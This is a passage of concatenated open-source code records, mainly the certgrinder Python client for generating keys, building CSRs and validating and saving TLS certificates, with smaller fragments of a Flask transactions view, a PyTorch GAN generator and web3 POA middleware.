get_last_transactions():\n # circular dependency hack\n\n try:\n data, error = validate_get_request(request.args)\n if error:\n return Response(ujson.dumps(error), 400, content_type='application/json')\n\n currency = data.get(\"currency\", '').upper()\n limit = data.get(\"limit\", 1)\n if limit > 100:\n limit = 100\n\n with session_scope() as session:\n if currency:\n db_data = session.query(Transactions).filter(currency==currency).order_by(desc(Transactions.created_at)).limit(limit).all()[:]\n redis_data = cache.get_data(currency, limit)\n else:\n db_data = session.query(Transactions).order_by(desc(Transactions.created_at)).limit(limit).all()[:]\n redis_data = cache.get_data(\"transactions\", limit-1)\n\n db_data = [make_dict(item) for item in db_data]\n\n return Response(ujson.dumps({\n \"request\": request.args,\n \"data\":[\n {\"source\": \"mysql\", \"transactions\": db_data},\n {\"source\": \"redis\", \"transactions\": redis_data}\n ]}), 200, content_type='application/json')\n\n except Exception as e:\n logger.exception(e)\n return Response(ujson.dumps(errors.INTERNAL_SERVER_ERROR), 500, content_type='application/json')\n","repo_name":"lismanb/fx","sub_path":"fx/views/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"12438000317","text":"import torch.nn as nn\n\nclass Generator(nn.Module):\n def __init__(self, image_size, hidden_size=256, latent_size=64):\n super(Generator, self).__init__()\n self.model = nn.Sequential(\n nn.Linear(latent_size, hidden_size),\n nn.LeakyReLU(0.2),\n nn.Linear(hidden_size, hidden_size),\n nn.LeakyReLU(0.2),\n nn.Linear(hidden_size, image_size),\n nn.Tanh(),\n )\n\n def forward(self, x):\n return self.model(x)\n","repo_name":"alifa98/Supercalifragilisticexpialidocious","sub_path":"GAN/model/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"30202058228","text":"from typing import (\n TYPE_CHECKING,\n Any,\n Callable,\n)\n\nfrom utils_eth.curried import (\n apply_formatter_if,\n apply_formatters_to_dict,\n apply_key_map,\n is_null,\n)\nfrom utils_eth.toolz import (\n complement,\n compose,\n)\nfrom hexbytes import (\n HexBytes,\n)\n\nfrom eth_web3._utils.rpc_abi import (\n RPC,\n)\nfrom eth_web3.middleware.formatting import (\n async_construct_formatting_middleware,\n construct_formatting_middleware,\n)\nfrom eth_web3.types import (\n AsyncMiddleware,\n RPCEndpoint,\n)\n\nif TYPE_CHECKING:\n from eth_web3 import Web3 # noqa: F401\n\nis_not_null = complement(is_null)\n\nremap_geth_poa_fields = apply_key_map(\n {\n \"extraData\": \"proofOfAuthorityData\",\n }\n)\n\npythonic_geth_poa = apply_formatters_to_dict(\n {\n \"proofOfAuthorityData\": HexBytes,\n }\n)\n\ngeth_poa_cleanup = compose(pythonic_geth_poa, remap_geth_poa_fields)\n\n\ngeth_poa_middleware = construct_formatting_middleware(\n result_formatters={\n RPC.eth_getBlockByHash: apply_formatter_if(is_not_null, geth_poa_cleanup),\n RPC.eth_getBlockByNumber: apply_formatter_if(is_not_null, geth_poa_cleanup),\n },\n)\n\n\nasync def async_geth_poa_middleware(\n make_request: Callable[[RPCEndpoint, Any], Any], w3: \"Web3\"\n) -> AsyncMiddleware:\n middleware = await async_construct_formatting_middleware(\n result_formatters={\n RPC.eth_getBlockByHash: apply_formatter_if(is_not_null, geth_poa_cleanup),\n RPC.eth_getBlockByNumber: apply_formatter_if(is_not_null, geth_poa_cleanup),\n },\n )\n return await middleware(make_request, w3)\n","repo_name":"Foundation-Eth/eth-web3","sub_path":"eth_web3/middleware/geth_poa.py","file_name":"geth_poa.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"94"} +{"seq_id":"22635728370","text":"#!/usr/bin/env python\n\"\"\"Certgrinder module.\n\nSee https://certgrinder.readthedocs.io/en/latest/certgrinder.html\nand https://github.com/tykling/certgrinder for more.\n\"\"\"\nimport argparse\nimport base64\nimport binascii\nimport datetime\nimport hashlib\nimport logging\nimport logging.handlers\nimport os\nimport random\nimport shlex\nimport subprocess\nimport sys\nimport tempfile\nimport time\nimport typing\nfrom importlib.metadata import PackageNotFoundError, version\nfrom pprint import pprint\n\nimport cryptography.x509\nimport dns.resolver # type: ignore\nimport yaml\nfrom cryptography.hazmat import primitives\nfrom cryptography.hazmat.backends import default_backend, openssl\nfrom cryptography.x509 import ocsp\nfrom pid import PidFile # type: ignore\n\nlogger = logging.getLogger(\"certgrinder.%s\" % __name__)\n\n# get version number from package metadata if possible\n__version__: str = \"0.0.0\"\n\"\"\"The value of this variable is taken from the Python package registry, and if that fails from the ``_version.py`` file written by ``setuptools_scm``.\"\"\"\n\ntry:\n __version__ = version(\"certgrinder\")\nexcept PackageNotFoundError:\n # package is not installed, get version from file\n try:\n from _version import version as __version__ # type: ignore\n except ImportError:\n # this must be a git checkout with no _version.py file, version unknown\n pass\n\n\nclass Certgrinder:\n \"\"\"The Certgrinder client class.\"\"\"\n\n # save version as a class attribute\n __version__ = __version__\n\n def __init__(self) -> None:\n \"\"\"Define the default config.\"\"\"\n self.conf: typing.Dict[str, typing.Union[str, int, bool, typing.List[str]]] = {\n \"alternate-chain\": False,\n \"caa-validation-methods\": \"dns-01,http-01\",\n \"certgrinderd\": \"certgrinderd\",\n \"cert-renew-threshold-days\": 30,\n \"domain-list\": [],\n \"invalid-ca-cn-list\": [\n \"Fake LE Intermediate X1\",\n \"Fake LE Intermediate X2\",\n ],\n \"key-type-list\": [\"rsa\", \"ecdsa\"],\n \"log-level\": \"INFO\",\n \"name-server\": \"\",\n \"ocsp-renew-threshold-percent\": 50,\n \"path\": \"\",\n \"periodic-sleep-minutes\": 60,\n \"pid-dir\": \"/tmp\",\n \"post-renew-hooks\": [],\n \"post-renew-hooks-dir\": \"\",\n \"post-renew-hooks-dir-runner\": \"\",\n \"staging\": False,\n \"syslog-facility\": \"\",\n \"syslog-socket\": \"\",\n \"tlsa-port\": \"\",\n \"tlsa-protocol\": \"\",\n \"tlsa-type-list\": [\"310\", \"311\", \"312\"],\n }\n\n # current domainset\n self.domainset: typing.List[str] = []\n\n # paths for current certificate and keys\n self.keypair_path: str = \"\"\n self.csr_path: str = \"\"\n self.certificate_path: str = \"\"\n self.certificate_chain_path: str = \"\"\n self.issuer_path: str = \"\"\n self.concat_path: str = \"\"\n self.ocsp_response_path: str = \"\"\n\n # this is set to True if an error occurs\n self.error: bool = False\n\n # this is set to True if we need to run a post renew hook\n self.hook_needed: bool = False\n\n def configure(\n self,\n userconfig: typing.Dict[str, typing.Union[str, int, bool, typing.List[str]]],\n ) -> None:\n \"\"\"Merge and check configuration and configure logging.\n\n Merge the supplied userconfig dict with the default config,\n checks for missing required settings, and configures logging and syslog.\n\n Args:\n userconfig: dict of the config to be merged with the default config\n\n Returns:\n None\n \"\"\"\n # merge default config with userconfig\n self.conf.update(userconfig)\n\n # define the log format used for stdout depending on the requested loglevel\n if self.conf[\"log-level\"] == \"DEBUG\":\n console_logformat = \"%(asctime)s certgrinder %(levelname)s Certgrinder.%(funcName)s():%(lineno)i: %(message)s\"\n else:\n console_logformat = \"%(asctime)s certgrinder %(levelname)s %(message)s\"\n\n # configure the log format used for console\n logging.basicConfig(\n level=getattr(logging, str(self.conf[\"log-level\"])),\n format=console_logformat,\n datefmt=\"%Y-%m-%d %H:%M:%S %z\",\n )\n\n # check if we have a domain-list\n if not self.conf[\"domain-list\"]:\n logger.error(\n \"No domain-list(s) configured. Specify --domain-list example.com[,www.example.com] (once per certificate) or define domain-list: in the config file.\"\n )\n sys.exit(1)\n\n # check if we have a path\n if not self.conf[\"path\"]:\n logger.error(\n \"No configured path. Specify --path or define path: in the config file.\"\n )\n sys.exit(1)\n\n # check if configured path exists\n if not os.path.exists(str(self.conf[\"path\"])):\n logger.error(f\"Configured path {self.conf['path']} does not exist\")\n sys.exit(1)\n\n # check if configured path is writable\n try:\n with tempfile.TemporaryFile(dir=str(self.conf[\"path\"])) as _:\n pass\n except PermissionError:\n logger.error(\n \"Permission error while accessing configured path {self.conf['path']}\"\n )\n sys.exit(1)\n\n # connect to syslog?\n if self.conf[\"syslog-socket\"] and self.conf[\"syslog-facility\"]:\n facility: int = getattr(\n logging.handlers.SysLogHandler, str(self.conf[\"syslog-facility\"])\n )\n syslog_handler = logging.handlers.SysLogHandler(\n address=str(self.conf[\"syslog-socket\"]), facility=facility\n )\n syslog_format = logging.Formatter(\"certgrinder: %(message)s\")\n syslog_handler.setFormatter(syslog_format)\n logger.addHandler(syslog_handler)\n # usually SysLogHandler is lazy and doesn't connect the socket until\n # a message has to be sent. Call _connect_unixsocket() now to force\n # an exception now if we can't connect to the socket\n syslog_handler._connect_unixsocket( # type: ignore\n self.conf[\"syslog-socket\"]\n )\n else:\n logger.debug(\"Not configuring syslog\")\n\n # is this staging mode?\n if self.conf[\"staging\"]:\n logger.debug(\n \"Staging mode enabled. Setting acme-server-url to 'https://acme-staging-v02.api.letsencrypt.org/directory' and invalid-ca-cn-list to an empty list.\"\n )\n self.conf[\n \"acme-server-url\"\n ] = \"https://acme-staging-v02.api.letsencrypt.org/directory\"\n self.conf[\"invalid-ca-cn-list\"] = []\n # set preferred-chain based on the value of alternate-chain\n if self.conf[\"alternate-chain\"]:\n # one intermediate\n self.conf[\"preferred-chain\"] = \"Fake_LE_Root_X2\"\n else:\n # two intermediates\n self.conf[\"preferred-chain\"] = \"Fake_LE_Root_X1\"\n else:\n # set preferred-chain based on the value of alternate-chain\n if self.conf[\"alternate-chain\"]:\n # the alternate chain has one intermediate\n self.conf[\"preferred-chain\"] = \"ISRG_Root_X1\"\n else:\n # the default chain has two intermediates\n self.conf[\"preferred-chain\"] = \"DST_Root_CA_X3\"\n\n if self.conf[\"preferred-chain\"] in [\"DST_Root_CA_X3\", \"Fake_LE_Root_X1\"]:\n # two intermediates\n self.conf[\"expected-chain-length\"] = 3\n else:\n # one intermediate\n self.conf[\"expected-chain-length\"] = 2\n\n logger.debug(\n f\"Certgrinder {__version__} configured OK - running with config: {self.conf}\"\n )\n\n # RSA KEY METHODS\n\n @staticmethod\n def load_keypair(\n path: str,\n ) -> typing.Union[\n openssl.rsa._RSAPrivateKey, primitives.asymmetric.ed25519.Ed25519PrivateKey\n ]:\n \"\"\"Load keypair bytes from disk, load key and return the object.\n\n Fixes keypair permissions to 640 if they are not 640.\n\n Args:\n path: The path to load the keypair from\n\n Returns:\n The keypair object\n \"\"\"\n # check permissions for self.keypair_path and fix to 640 if needed\n if oct(os.stat(path).st_mode)[4:] != \"0640\":\n logger.warning(\n f\"Keypair {path} has incorrect permissions, fixing to 0640...\"\n )\n os.chmod(path, 0o640)\n\n # read keypair\n with open(path, \"rb\") as f:\n keypair_bytes = f.read()\n\n # parse and return keypair\n return primitives.serialization.load_pem_private_key(\n keypair_bytes, password=None, backend=default_backend()\n )\n\n @staticmethod\n def generate_private_key(\n keytype: str,\n ) -> typing.Union[\n openssl.rsa._RSAPrivateKey,\n openssl.ec._EllipticCurvePrivateKey,\n primitives.asymmetric.ed25519.Ed25519PrivateKey,\n ]:\n \"\"\"Generate and returns a private key.\n\n Args:\n keytype: \"rsa\" for RSA key, \"ecdsa\" for ECDSA and \"ed25519\" for ed25519\n\n Returns:\n The keypair object\n\n Raises:\n ValueError: For unsupported keytypes\n \"\"\"\n if keytype == \"rsa\":\n return primitives.asymmetric.rsa.generate_private_key(\n public_exponent=65537, key_size=4096, backend=default_backend()\n )\n elif keytype == \"ecdsa\":\n return primitives.asymmetric.ec.generate_private_key(\n primitives.asymmetric.ec.SECP384R1(),\n backend=default_backend(),\n )\n elif keytype == \"ed25519\":\n return primitives.asymmetric.ed25519.Ed25519PrivateKey.generate()\n else:\n raise ValueError(f\"Unsupported keytype: {keytype}\")\n\n @staticmethod\n def save_keypair(\n keypair: typing.Union[\n openssl.rsa._RSAPrivateKey, primitives.asymmetric.ed25519.Ed25519PrivateKey\n ],\n path: str,\n ) -> None:\n \"\"\"Save keypair to disk.\n\n Args:\n keypair: The keypair to save\n path: The path to save the keypair in\n\n Returns:\n None\n\n Raises:\n ValueError: For unsupported keytypes\n \"\"\"\n if isinstance(keypair, openssl.rsa._RSAPrivateKey):\n keyformat = primitives.serialization.PrivateFormat.TraditionalOpenSSL\n elif isinstance(keypair, primitives.asymmetric.ed25519.Ed25519PrivateKey):\n keyformat = primitives.serialization.PrivateFormat.PKCS8\n elif isinstance(keypair, openssl.ec._EllipticCurvePrivateKey):\n keyformat = primitives.serialization.PrivateFormat.PKCS8\n else:\n raise ValueError(f\"Unsupported keytype: {type(keypair)}\")\n\n with open(path, \"wb\") as f:\n f.write(\n keypair.private_bytes(\n encoding=primitives.serialization.Encoding.PEM,\n format=keyformat,\n encryption_algorithm=primitives.serialization.NoEncryption(),\n )\n )\n os.chmod(path, 0o640)\n\n @staticmethod\n def get_der_pubkey(\n keypair: typing.Union[\n openssl.rsa._RSAPrivateKey, primitives.asymmetric.ed25519.Ed25519PrivateKey\n ]\n ) -> bytes:\n \"\"\"Return the DER formatted publickey.\n\n Args:\n keypair: The keypair which contains the public key\n\n Returns:\n The bytes representing the DER formatted public key\n \"\"\"\n derbytes: bytes = keypair.public_key().public_bytes(\n encoding=primitives.serialization.Encoding.DER,\n format=primitives.serialization.PublicFormat.SubjectPublicKeyInfo,\n )\n return derbytes\n\n # CSR METHODS\n\n @staticmethod\n def generate_csr(\n keypair: typing.Union[\n openssl.rsa._RSAPrivateKey, primitives.asymmetric.ed25519.Ed25519PrivateKey\n ],\n domains: typing.List[str],\n ) -> cryptography.x509.CertificateSigningRequest:\n \"\"\"Generate and return a new CSR based on the public key and list of domains.\n\n Only set CN since everything else is removed by LetsEncrypt in the certificate anyway.\n Add all domains in subjectAltName, including the one put into CN.\n\n Args:\n keypair: The keypair to base the CSR on\n domains: A list of domains to put in the CSR. First in the list will be cert CN.\n\n Returns:\n The CSR object\n \"\"\"\n # build list of cryptography.x509.DNSName objects for SAN\n x509_name_list: typing.List[cryptography.x509.GeneralName] = []\n for domain in domains:\n domain = domain.encode(\"idna\").decode(\"utf-8\")\n logger.debug(\"Adding %s to CSR...\" % domain)\n x509_name_list.append(cryptography.x509.DNSName(domain))\n\n # build the CSR\n csr = (\n cryptography.x509.CertificateSigningRequestBuilder()\n .subject_name(\n cryptography.x509.Name(\n [\n cryptography.x509.NameAttribute(\n cryptography.x509.oid.NameOID.COMMON_NAME,\n domains[0].encode(\"idna\").decode(\"utf-8\"),\n )\n ]\n )\n )\n .add_extension(\n cryptography.x509.SubjectAlternativeName(x509_name_list),\n # TODO: should SubjectAltName be critical?\n critical=False,\n )\n .sign(\n keypair,\n primitives.hashes.SHA256(),\n default_backend(),\n )\n )\n return csr\n\n @staticmethod\n def save_csr(csr: cryptography.x509.CertificateSigningRequest, path: str) -> None:\n \"\"\"Save the PEM version of the CSR to the path.\n\n chmods the file 644 after writing.\n\n Args:\n csr: The CSR to be saved\n path: The path to save the CSR to\n\n Returns:\n None\n \"\"\"\n with open(path, \"wb\") as f:\n f.write(csr.public_bytes(primitives.serialization.Encoding.PEM))\n os.chmod(path, 0o644)\n\n # CERTIFICATE METHODS\n\n def load_certificates(\n self, path: str\n ) -> typing.List[cryptography.x509.Certificate]:\n \"\"\"Reads PEM certificate data from the path, parses the certificate(s), and returns them in a list.\n\n Args:\n path: The path to read the PEM certificate(s) from\n\n Returns:\n A list of cryptography.x509.Certificate objects\n \"\"\"\n with open(path, \"rb\") as f:\n pem_bytes = f.read()\n cert_bytes_list = self.split_pem_chain(pem_bytes)\n certificates = []\n for certbytes in cert_bytes_list:\n certificate = self.parse_certificate(certbytes)\n if not certificate:\n # something went wrong while parsing this certificate,\n # just return an empty list\n return []\n certificates.append(certificate)\n return certificates\n\n @staticmethod\n def check_certificate_issuer(\n certificate: cryptography.x509.Certificate, invalid_ca_cn_list: typing.List[str]\n ) -> bool:\n \"\"\"Check the issuer of the certificate.\n\n Args:\n certificate: The certificate to check\n invalid_ca_cn_list: The list of CA CommonName strings to consider invalid\n\n Returns:\n True if the certificate issuer CN is not in invalid_ca_cn_list\n \"\"\"\n # Return False if the certificate was issued by itself\n if certificate.issuer == certificate.subject:\n logger.debug(\"This certificate is selfsigned, returning False\")\n return False\n\n # do we have any invalid CA CNs? otherwise bail out now\n if not invalid_ca_cn_list:\n logger.debug(\"We have an empty invalid_ca_cn_list, returning True\")\n return True\n\n # check if certificate was issued by an invalid CA CN\n for x in certificate.issuer:\n if (\n x.oid == cryptography.x509.oid.NameOID.COMMON_NAME\n and x.value in invalid_ca_cn_list\n ):\n logger.debug(\n f\"This certificate was issued by a CA CN ({x.value}) in invalid_ca_cn_list ({invalid_ca_cn_list}), check_certificate_issuer() returning False\"\n )\n return False\n\n # all good\n return True\n\n @staticmethod\n def check_certificate_expiry(\n certificate: cryptography.x509.Certificate, threshold_days: int\n ) -> bool:\n \"\"\"Check the remaining validity of the certificate.\n\n Args:\n certificate: The certificate to check\n threshold_days: The lowest number of remaining days of validity that is considered valid\n\n Returns:\n True if remaining certificate lifetime is >= threshold_days, False if not\n \"\"\"\n expiredelta = certificate.not_valid_after - datetime.datetime.now()\n if expiredelta.days < threshold_days:\n return False\n else:\n return True\n\n @staticmethod\n def check_certificate_public_key(\n certificate: cryptography.x509.Certificate,\n public_key: typing.Union[\n openssl.rsa._RSAPublicKey, primitives.asymmetric.ed25519.Ed25519PublicKey\n ],\n ) -> bool:\n \"\"\"Make sure certificate has the specified public key.\n\n Args:\n certificate: The certificate to check\n public_key: The public key\n\n Returns:\n True if the public key matches, False if not\n \"\"\"\n return bool(\n public_key.public_bytes(\n encoding=primitives.serialization.Encoding.PEM,\n format=primitives.serialization.PublicFormat.SubjectPublicKeyInfo,\n )\n == certificate.public_key().public_bytes(\n encoding=primitives.serialization.Encoding.PEM,\n format=primitives.serialization.PublicFormat.SubjectPublicKeyInfo,\n )\n )\n\n @staticmethod\n def check_certificate_subject(\n certificate: cryptography.x509.Certificate, subject: cryptography.x509.Name\n ) -> bool:\n \"\"\"Make sure the certificate has the specified subject.\n\n Args:\n certificate: The certificate to check\n subject: The subject to expect\n\n Returns:\n True if the subject matches the cert, False if not\n \"\"\"\n return str(certificate.subject) == str(subject)\n\n @staticmethod\n def check_certificate_san_names(\n certificate: cryptography.x509.Certificate, san_names: typing.List[str]\n ) -> bool:\n \"\"\"Make sure the certificate has the provided list of names as SAN.\n\n Args:\n certificate: The certificate to check\n san_names: A list of the names to expect\n\n Returns:\n True if all san_names were found in the cert, and no others.\n \"\"\"\n cert_san = certificate.extensions.get_extension_for_oid(\n cryptography.x509.ExtensionOID.SUBJECT_ALTERNATIVE_NAME\n ).value\n # make mypy happy\n assert isinstance(cert_san, cryptography.x509.SubjectAlternativeName)\n cert_san_names = cert_san.get_values_for_type(cryptography.x509.DNSName)\n\n # make sure san_names list is idna encoded\n san_names = [name.encode(\"idna\").decode(\"ascii\") for name in san_names]\n\n # if there is a difference between the sets we want to return False\n return not bool(set(cert_san_names).symmetric_difference(san_names))\n\n @classmethod\n def check_certificate_validity(\n cls,\n certificate: cryptography.x509.Certificate,\n invalid_ca_cn_list: typing.List[str],\n threshold_days: int,\n san_names: typing.List[str],\n public_key: typing.Optional[\n typing.Union[\n openssl.rsa._RSAPublicKey,\n primitives.asymmetric.ed25519.Ed25519PublicKey,\n ]\n ] = None,\n subject: typing.Optional[cryptography.x509.Name] = None,\n ) -> bool:\n \"\"\"Perform a few sanity checks of the certificate.\n\n - Check that the issuer is valid\n - Check that the certificate expiry is not exceeded\n - Check that the public key is correct (if provided)\n - Check that the subject is correct (if provided)\n - Check that the SubjectAltName data is correct\n\n Args:\n certificate: The certificate to check\n invalid_ca_cn_list: A list of CA CommonNames to consider invalid\n threshold_days: The minimum number of remaining days lifetime to considered valid.\n san_names: A list of domain names to expect in SubjectAltName of the certificate.\n keypair: The keypair the certificate is for.\n\n Returns:\n False if a problem is found, True if all is well.\n \"\"\"\n if not cls.check_certificate_issuer(certificate, invalid_ca_cn_list):\n logger.error(\n f\"Certificate is self-signed or the issuer {certificate.issuer} CN is on our list of invalid CAs: {invalid_ca_cn_list}.\"\n )\n return False\n if not cls.check_certificate_expiry(certificate, threshold_days):\n logger.error(f\"Certificate expires in less than {threshold_days} days\")\n return False\n if public_key and not cls.check_certificate_public_key(certificate, public_key):\n logger.error(\"Certificate public key is different from the expected\")\n return False\n if subject and not cls.check_certificate_subject(certificate, subject):\n logger.error(\"Certificate subject is different from the expected\")\n return False\n if not cls.check_certificate_san_names(certificate, san_names):\n logger.error(\n f\"Certificate SAN name list is different from the expected: {san_names}\"\n )\n return False\n logger.debug(\"Certificate is OK, returning True\")\n return True\n\n @staticmethod\n def save_certificate(\n certificate: cryptography.x509.Certificate,\n path: str,\n issuers: typing.List[cryptography.x509.Certificate] = [],\n ) -> None:\n \"\"\"Save the PEM certificate to the path, optionally with an issuer chain.\n\n Args:\n certificate: The certificate to save\n path: The path to save the certificate in\n issuer: The list of issuer certificates to write after the certificate (if any)\n\n Returns:\n None\n \"\"\"\n with open(path, \"wb\") as f:\n f.write(certificate.public_bytes(primitives.serialization.Encoding.PEM))\n if issuers:\n for issuer in issuers:\n f.write(issuer.public_bytes(primitives.serialization.Encoding.PEM))\n os.chmod(path, 0o644)\n\n @classmethod\n def save_concat_certkey(\n cls,\n keypair: typing.Union[\n openssl.rsa._RSAPrivateKey, primitives.asymmetric.ed25519.Ed25519PrivateKey\n ],\n certificate: cryptography.x509.Certificate,\n issuers: typing.List[cryptography.x509.Certificate],\n path: str,\n ) -> None:\n \"\"\"Create a single file with the private key, the cert and the issuer(s), in that order.\n\n Args:\n keypair: The keypair to save in the concat file\n certificate: The certificate to save in the concat file\n issuers: The list of issuer(s) to save in the concat file\n path: The path to save the concat file in\n\n Returns:\n None\n \"\"\"\n cls.save_keypair(keypair, path)\n with open(path, \"ab\") as f:\n f.write(certificate.public_bytes(primitives.serialization.Encoding.PEM))\n for issuer in issuers:\n f.write(issuer.public_bytes(primitives.serialization.Encoding.PEM))\n os.chmod(path, 0o640)\n\n def get_certgrinderd_command(\n self, subcommand: typing.List[str]\n ) -> typing.List[str]:\n \"\"\"Return the certgrinderd command to run.\n\n Adds ``--log-level`` with the current ``self.conf[\"log-level\"]``.\n Also adds --acme-server-url if configured, and --preferred-chain.\n\n Args:\n subcommand: The certgrinderd subcommand to run as a list, like [\"get\", \"ocsp\"]\n\n Returns:\n A list of the elements which make up the ``certgrinderd`` command\n \"\"\"\n # put the command together, first the base command, then the args, then subcommand\n command = str(self.conf[\"certgrinderd\"])\n commandlist = shlex.split(command)\n\n # pass the certgrinder log-level to certgrinderd\n commandlist.append(\"--log-level\")\n commandlist.append(str(self.conf[\"log-level\"]))\n\n # pass the acme-server-url if we have one\n if \"acme-server-url\" in self.conf:\n commandlist.append(\"--acme-server-url\")\n commandlist.append(str(self.conf[\"acme-server-url\"]))\n\n # pass the preferred-chain\n commandlist.append(\"--preferred-chain\")\n commandlist.append(str(self.conf[\"preferred-chain\"]))\n\n # add the requested certgrinderd command and subcommand,\n # \"get certificate\" or \"get ocsp\" mostly\n commandlist += subcommand\n\n # all good\n return commandlist\n\n def run_certgrinderd(\n self,\n stdin: bytes,\n command: typing.List[str],\n certgrinderd_stdout: bytes = b\"\",\n certgrinderd_stderr: bytes = b\"\",\n ) -> bytes:\n \"\"\"Run the configured ``self.conf[\"certgrinderd\"]`` command.\n\n The stdin argument will be passed to stdin of the command. A CSR is needed for\n the \"get certificate\" certgrinderd command, and a certificate chain is needed for\n the \"get ocsp\" command.\n\n Args:\n stdin: bytes representing CSR or cert chain to pass to the certgrinderd command\n command: The certgrinderd command and subcommand to call\n certgrinderd_stdout: Mocked certgrinderd stdout to use instead of calling the command\n certgrinderd_stderr: Mocked certgrinderd stderr to use instead of calling the command\n\n Returns:\n The bytes representing the stdout from the subprocess call\n \"\"\"\n if not certgrinderd_stdout and not certgrinderd_stderr:\n commandlist = self.get_certgrinderd_command(subcommand=command)\n logger.debug(f\"Running certgrinderd command: {commandlist}\")\n p = subprocess.Popen(\n commandlist,\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n )\n\n # send stdin and save stdout (the certificate chain/OCSP response/other output) +\n # stderr (the certgrinderd logging)\n certgrinderd_stdout, certgrinderd_stderr = p.communicate(input=stdin)\n logger.debug(\n f\"certgrinderd command returned {len(certgrinderd_stdout)} bytes stdout and {len(certgrinderd_stderr)} bytes stderr output\"\n )\n\n # log certgrinderd_stderr (which contains all the certgrinderd logging) at the level it was logged to, as possible\n if isinstance(certgrinderd_stderr, bytes):\n for line in certgrinderd_stderr.strip().decode(\"utf-8\").split(\"\\n\"):\n # do not log empty lines\n if not line:\n continue\n\n # split line in words\n words = line.split(\" \")\n if len(words) < 5:\n # cannot parse, log the whole line\n logger.warning(line)\n continue\n\n # get the loglevel\n level = words[4]\n message = \" \".join(words[5:])\n if hasattr(logger, level.lower()):\n if level.lower() == \"debug\":\n getattr(logger, level.lower())(message)\n else:\n getattr(logger, level.lower())(f\"certgrinderd: {message}\")\n else:\n # cannot grok, log the whole line\n logger.warning(line)\n\n # finally return the actual output to caller\n return certgrinderd_stdout\n\n @staticmethod\n def split_pem_chain(pem_chain_bytes: bytes) -> typing.List[bytes]:\n \"\"\"Split a PEM chain into a list of bytes of the individual PEM certificates.\n\n Args:\n pem_chain_bytes: The bytes representing the PEM chain\n\n Returns:\n A list of 0 or more bytes chunks representing each certificate\n \"\"\"\n logger.debug(f\"Parsing certificates from {len(pem_chain_bytes)} bytes input\")\n certificates = []\n cert_list = pem_chain_bytes.decode(\"ASCII\").split(\"-----BEGIN CERTIFICATE-----\")\n for cert in cert_list[1:]:\n certificates.append((\"-----BEGIN CERTIFICATE-----\" + cert).encode(\"ASCII\"))\n logger.debug(\n f\"Returning a list of {len(certificates)} chunks of bytes resembling PEM certificates\"\n )\n return certificates\n\n @staticmethod\n def parse_certificate(\n certificate_bytes: bytes,\n ) -> typing.Optional[cryptography.x509.Certificate]:\n \"\"\"Parse a bunch of bytes representing a PEM certificate and return.\n\n Args:\n certificate_bytes: The PEM certificate\n\n Returns:\n The parsed cryptography.x509.Certificate object or None\n \"\"\"\n try:\n return cryptography.x509.load_pem_x509_certificate(\n certificate_bytes, default_backend()\n )\n except Exception:\n logger.error(\n \"Unable to parse, this is not a valid PEM formatted certificate.\"\n )\n logger.debug(\"This is the certificate which failed to parse:\")\n logger.debug(certificate_bytes)\n return None\n\n def parse_certificate_chain(\n self, certificate_chain: bytes, csr: cryptography.x509.CertificateSigningRequest\n ) -> typing.Optional[typing.List[cryptography.x509.Certificate]]:\n \"\"\"Split a PEM chain into a list of certificates.\n\n Args:\n certificate_chain: The bytes representing the PEM formatted certificate chain\n csr: The CSR this certificate was issued from\n\n Returns:\n A list of certificates with the leaf certificate first,\n or None if an error happens\n \"\"\"\n certs = self.split_pem_chain(certificate_chain)\n if len(certs) != self.conf[\"expected-chain-length\"]:\n logger.error(\n f\"The input does not contain a valid certificate chain (it does not have {self.conf['expected-chain-length']} PEM-looking chunks, it has {len(certs)}).\"\n )\n logger.debug(\"This is the certificate chain which failed to parse:\")\n logger.debug(certificate_chain)\n # we do not have a valid certificate\n return None\n\n certificates = []\n for certbytes in certs:\n certificate = self.parse_certificate(certbytes)\n if not certificate:\n return None\n certificates.append(certificate)\n\n # keep mypy happy in spite of the mixed type self.conf dict\n assert isinstance(self.conf[\"invalid-ca-cn-list\"], list)\n assert isinstance(self.conf[\"cert-renew-threshold-days\"], int)\n # a few sanity checks of the certificate seems like a good idea\n valid = self.check_certificate_validity(\n certificate=certificates[0],\n invalid_ca_cn_list=[]\n if self.conf[\"staging\"]\n else [str(x) for x in self.conf[\"invalid-ca-cn-list\"]],\n threshold_days=self.conf[\"cert-renew-threshold-days\"],\n public_key=self.keypair.public_key(),\n subject=csr.subject,\n san_names=self.domainset,\n )\n if not valid:\n logger.error(\"Certificate is not valid.\")\n self.error = True\n return None\n\n # we have a new certificate, so we will need to run the post renew hook later\n self.hook_needed = True\n\n # done, return the certificate chain bytes\n return certificates\n\n def get_certificate(\n self,\n csr: typing.Optional[cryptography.x509.CertificateSigningRequest] = None,\n stdout: typing.Optional[bytes] = None,\n ) -> bool:\n \"\"\"Get a new certificate for self.domainset.\n\n This methods gets a new certificate regardless of the status of any\n existing certificate. It is called by ``self.periodic()`` as needed.\n It can also be called by the ``get certificate`` subcommand.\n\n Args:\n csr: The CSR to use instead of generating one\n stdout: The stdout bytes to use instead of calling self.run_certgrinderd(csr)\n\n Returns:\n False something goes wrong, True if all is well\n \"\"\"\n logger.info(f\"Getting new certificate for domainset {self.domainset} ...\")\n # do we have a CSR or do we generate one?\n if not csr:\n # generate new CSR\n csr = self.generate_csr(self.keypair, self.domainset)\n self.save_csr(csr, self.csr_path)\n logger.debug(\n f\"Wrote {len(csr.public_bytes(primitives.serialization.Encoding.PEM))} bytes CSR to path {self.csr_path}\"\n )\n\n # do we have stdout or do we run certgrinderd for real?\n\n if not stdout:\n # get certificate\n stdout = self.run_certgrinderd(\n stdin=csr.public_bytes(primitives.serialization.Encoding.PEM),\n command=[\"get\", \"certificate\"],\n )\n\n # did we get any output?\n if not stdout:\n logger.error(\n \"Did not get any output, expected a certificate chain in stdout from certgrinderd\"\n )\n return False\n\n # parse the output\n certificates = self.parse_certificate_chain(stdout, csr)\n\n # certificates should be a tuple of 2 or 3 certificates\n if certificates:\n certificate = certificates[0]\n issuers = certificates[1:]\n else:\n logger.error(\"Did not get a certificate :(\")\n return False\n\n issuerlen = 0\n for issuer in issuers:\n issuerlen += 